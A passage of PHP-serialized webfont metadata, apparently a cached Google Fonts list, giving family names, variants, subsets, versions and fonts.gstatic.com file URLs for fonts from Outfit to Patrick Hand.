.ttf\";s:3:\"600\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4e6yC4G-EiAou6Y.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4deyC4G-EiAou6Y.ttf\";s:3:\"800\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4bCyC4G-EiAou6Y.ttf\";s:3:\"900\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4ZmyC4G-EiAou6Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1040;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Over the Rainbow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/overtherainbow/v16/11haGoXG1k_HKhMLUWz7Mc7vvW5upvOm9NA2XG0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1041;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Overlock\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/overlock/v15/Z9XVDmdMWRiN1_T9Z4Te4u2El6GC.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/overlock/v15/Z9XTDmdMWRiN1_T9Z7Tc6OmmkrGC7Cs.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/overlock/v15/Z9XSDmdMWRiN1_T9Z7xizcmMvL2L9TLT.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/overlock/v15/Z9XQDmdMWRiN1_T9Z7Tc0FWJtrmp8CLTlNs.ttf\";s:3:\"900\";s:76:\"http://fonts.gstatic.com/s/overlock/v15/Z9XSDmdMWRiN1_T9Z7xaz8mMvL2L9TLT.ttf\";s:9:\"900italic\";s:79:\"http://fonts.gstatic.com/s/overlock/v15/Z9XQDmdMWRiN1_T9Z7Tc0G2Ltrmp8CLTlNs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1042;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Overlock SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/overlocksc/v21/1cX3aUHKGZrstGAY8nwVzHGAq8Sk1PoH.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1043;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Overpass\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6_PLrOZCLtce-og.ttf\";s:3:\"200\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6fPPrOZCLtce-og.ttf\";s:3:\"300\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6ovPrOZCLtce-og.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6_PPrOZCLtce-og.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6zvPrOZCLtce-og.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6IvTrOZCLtce-og.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6G_TrOZCLtce-og.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6fPTrOZCLtce-og.ttf\";s:3:\"900\";s:90:\"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6VfTrOZCLtce-og.ttf\";s:9:\"100italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLADe5qPl8Kuosgz.ttf\";s:9:\"200italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLCDepqPl8Kuosgz.ttf\";s:9:\"300italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLBdepqPl8Kuosgz.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLADepqPl8Kuosgz.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLAxepqPl8Kuosgz.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLDdfZqPl8Kuosgz.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLDkfZqPl8Kuosgz.ttf\";s:9:\"800italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLCDfZqPl8Kuosgz.ttf\";s:9:\"900italic\";s:92:\"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLCqfZqPl8Kuosgz.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1044;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Overpass Mono\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EWKokzzXur-SmIr.ttf\";s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EXUokzzXur-SmIr.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EXmokzzXur-SmIr.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EUKpUzzXur-SmIr.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EUzpUzzXur-SmIr.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1045;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Ovo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:61:\"http://fonts.gstatic.com/s/ovo/v17/yYLl0h7Wyfzjy4Q5_3WVxA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1046;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Oxanium\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G83JfniMBXQ7d67x.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G80XfniMBXQ7d67x.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G81JfniMBXQ7d67x.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G817fniMBXQ7d67x.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G82XeXiMBXQ7d67x.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G82ueXiMBXQ7d67x.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G83JeXiMBXQ7d67x.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1047;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Oxygen\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/oxygen/v15/2sDcZG1Wl4LcnbuCJW8Db2-4C7wFZQ.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/oxygen/v15/2sDfZG1Wl4Lcnbu6iUcnZ0SkAg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/oxygen/v15/2sDcZG1Wl4LcnbuCNWgDb2-4C7wFZQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1048;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Oxygen Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/oxygenmono/v13/h0GsssGg9FxgDgCjLeAd7ijfze-PPlUu.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1049;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"PT Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/ptmono/v13/9oRONYoBnWILk-9ArCg5MtPyAcg.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1050;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"PT Sans\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79P0WOxOGMMDQ.ttf\";s:6:\"italic\";s:72:\"http://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0eEwMOJIDQA-g.ttf\";s:3:\"700\";s:73:\"http://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh4OmnLD0Z4zM.ttf\";s:9:\"700italic\";s:76:\"http://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOytKB8c8zMrig.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1051;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"PT Sans Caption\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/ptsanscaption/v18/0FlMVP6Hrxmt7-fsUFhlFXNIlpcqfQXwQy6yxg.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/ptsanscaption/v18/0FlJVP6Hrxmt7-fsUFhlFXNIlpcSwSrUSwWuz38Tgg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1052;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"PT Sans Narrow\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/ptsansnarrow/v17/BngRUXNadjH0qYEzV7ab-oWlsYCByxyKeuDp.ttf\";s:3:\"700\";s:88:\"http://fonts.gstatic.com/s/ptsansnarrow/v17/BngSUXNadjH0qYEzV7ab-oWlsbg95DiCUfzgRd-3.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1053;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"PT Serif\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/ptserif/v17/EJRVQgYoZZY2vCFuvDFRxL6ddjb-.ttf\";s:6:\"italic\";s:74:\"http://fonts.gstatic.com/s/ptserif/v17/EJRTQgYoZZY2vCFuvAFTzrq_cyb-vco.ttf\";s:3:\"700\";s:75:\"http://fonts.gstatic.com/s/ptserif/v17/EJRSQgYoZZY2vCFuvAnt65qVXSr3pNNB.ttf\";s:9:\"700italic\";s:78:\"http://fonts.gstatic.com/s/ptserif/v17/EJRQQgYoZZY2vCFuvAFT9gaQVy7VocNB6Iw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1054;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"PT Serif Caption\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/ptserifcaption/v17/ieVl2ZhbGCW-JoW6S34pSDpqYKU059WxDCs5cvI.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/ptserifcaption/v17/ieVj2ZhbGCW-JoW6S34pSDpqYKU019e7CAk8YvJEeg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1055;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Pacifico\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ96A4sijpFu_.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1056;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Padauk\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:7:\"myanmar\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/padauk/v14/RrQRboJg-id7OnbBa0_g3LlYbg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/padauk/v14/RrQSboJg-id7Onb512DE1JJEZ4YwGg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1057;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Palanquin\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:77:\"http://fonts.gstatic.com/s/palanquin/v13/9XUhlJ90n1fBFg7ceXwUEltI7rWmZzTH.ttf\";s:3:\"200\";s:79:\"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUvnpoxJuqbi3ezg.ttf\";s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwU2nloxJuqbi3ezg.ttf\";s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/palanquin/v13/9XUnlJ90n1fBFg7ceXwsdlFMzLC2Zw.ttf\";s:3:\"500\";s:79:\"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUgnhoxJuqbi3ezg.ttf\";s:3:\"600\";s:79:\"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUrn9oxJuqbi3ezg.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUyn5oxJuqbi3ezg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1058;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Palanquin Dark\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/palanquindark/v12/xn75YHgl1nqmANMB-26xC7yuF_6OTEo9VtfE.ttf\";s:3:\"500\";s:89:\"http://fonts.gstatic.com/s/palanquindark/v12/xn76YHgl1nqmANMB-26xC7yuF8Z6ZW41fcvN2KT4.ttf\";s:3:\"600\";s:89:\"http://fonts.gstatic.com/s/palanquindark/v12/xn76YHgl1nqmANMB-26xC7yuF8ZWYm41fcvN2KT4.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/palanquindark/v12/xn76YHgl1nqmANMB-26xC7yuF8YyY241fcvN2KT4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1059;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Pangolin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/pangolin/v11/cY9GfjGcW0FPpi-tWPfK5d3aiLBG.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1060;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Paprika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/paprika/v21/8QIJdijZitv49rDfuIgOq7jkAOw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1061;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Parisienne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/parisienne/v13/E21i_d3kivvAkxhLEVZpcy96DuKuavM.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1062;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Passero One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/passeroone/v24/JTUTjIko8DOq5FeaeEAjgE5B5Arr-s50.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1063;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Passion One\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/passionone/v16/PbynFmL8HhTPqbjUzux3JHuW_Frg6YoV.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/passionone/v16/Pby6FmL8HhTPqbjUzux3JEMq037owpYcuH8y.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/passionone/v16/Pby6FmL8HhTPqbjUzux3JEMS0X7owpYcuH8y.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1064;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Passions Conflict\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/passionsconflict/v5/kmKnZrcrFhfafnWX9x0GuEC-zowow5NeYRI4CN2V.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1065;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Pathway Gothic One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/pathwaygothicone/v14/MwQrbgD32-KAvjkYGNUUxAtW7pEBwx-dTFxeb80flQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1066;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Patrick Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYeMWcjKm7sp8g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1067;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Patrick Hand 